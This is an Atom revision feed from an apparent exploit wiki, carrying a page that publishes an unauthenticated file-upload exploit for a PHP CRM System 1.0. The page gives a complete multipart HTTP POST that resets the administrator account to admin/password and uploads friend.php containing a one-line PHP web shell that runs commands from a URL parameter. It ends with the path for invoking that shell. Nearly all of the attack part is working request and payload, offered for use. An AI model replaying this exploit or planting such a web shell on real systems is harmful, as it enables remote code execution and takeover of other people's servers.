<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Customer_Relationship_Management_%28CRM%29_System_1.0_%E9%81%A0%E7%A8%8BShell%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E</id>
	<title>Customer Relationship Management (CRM) System 1.0 遠程Shell上傳漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Customer_Relationship_Management_%28CRM%29_System_1.0_%E9%81%A0%E7%A8%8BShell%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Customer_Relationship_Management_(CRM)_System_1.0_%E9%81%A0%E7%A8%8BShell%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T12:35:04Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Customer_Relationship_Management_(CRM)_System_1.0_%E9%81%A0%E7%A8%8BShell%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&amp;diff=2792&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Customer Relationship Management (CRM) Unrestricted File Upload (unauthenticated) # Date: 11/05/2021 # Exploit Author: Richard Jones # Vendor Ho...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Customer_Relationship_Management_(CRM)_System_1.0_%E9%81%A0%E7%A8%8BShell%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&amp;diff=2792&amp;oldid=prev"/>
		<updated>2021-05-12T08:55:02Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Customer Relationship Management (CRM) Unrestricted File Upload (unauthenticated) # Date: 11/05/2021 # Exploit Author: Richard Jones # Vendor Ho...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Customer Relationship Management (CRM) Unrestricted File Upload (unauthenticated)&lt;br /&gt;
# Date: 11/05/2021&lt;br /&gt;
# Exploit Author: Richard Jones&lt;br /&gt;
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html&lt;br /&gt;
# Software Link: https://www.sourcecodester.com/download-code?nid=14794&amp;amp;title=Customer+Relationship+Management+%28CRM%29+System+in+PHP+with+Source+Code&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Tested on: # Tested on: windows 10 (build 19041) + xampp v3.2.4&lt;br /&gt;
&lt;br /&gt;
POST /crm/classes/Users.php?f=save HTTP/1.1&lt;br /&gt;
Host: localhost&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0&lt;br /&gt;
Accept: */*&lt;br /&gt;
Accept-Language: en-GB,en;q=0.5&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
X-Requested-With: XMLHttpRequest&lt;br /&gt;
Content-Type: multipart/form-data; boundary=---------------------------73401159029622284642216073649&lt;br /&gt;
Content-Length: 852&lt;br /&gt;
Origin: http://localhost&lt;br /&gt;
Connection: close&lt;br /&gt;
Referer: http://localhost/crm/customer/?page=user&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------------------------73401159029622284642216073649&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;id&amp;quot;&lt;br /&gt;
&lt;br /&gt;
1&lt;br /&gt;
-----------------------------73401159029622284642216073649&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;firstname&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Adminstrator&lt;br /&gt;
-----------------------------73401159029622284642216073649&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;lastname&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Admin&lt;br /&gt;
-----------------------------73401159029622284642216073649&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;username&amp;quot;&lt;br /&gt;
&lt;br /&gt;
admin&lt;br /&gt;
-----------------------------73401159029622284642216073649&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;password&amp;quot;&lt;br /&gt;
&lt;br /&gt;
password&lt;br /&gt;
-----------------------------73401159029622284642216073649&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;img&amp;quot;; filename=&amp;quot;friend.php&amp;quot;&lt;br /&gt;
Content-Type: application/octet-stream&lt;br /&gt;
&lt;br /&gt;
&amp;lt;?php system($_GET['c']);?&amp;gt;&lt;br /&gt;
-----------------------------73401159029622284642216073649--&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#Call shell at /crm/uploads/123123_friend.php?c=whoami&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>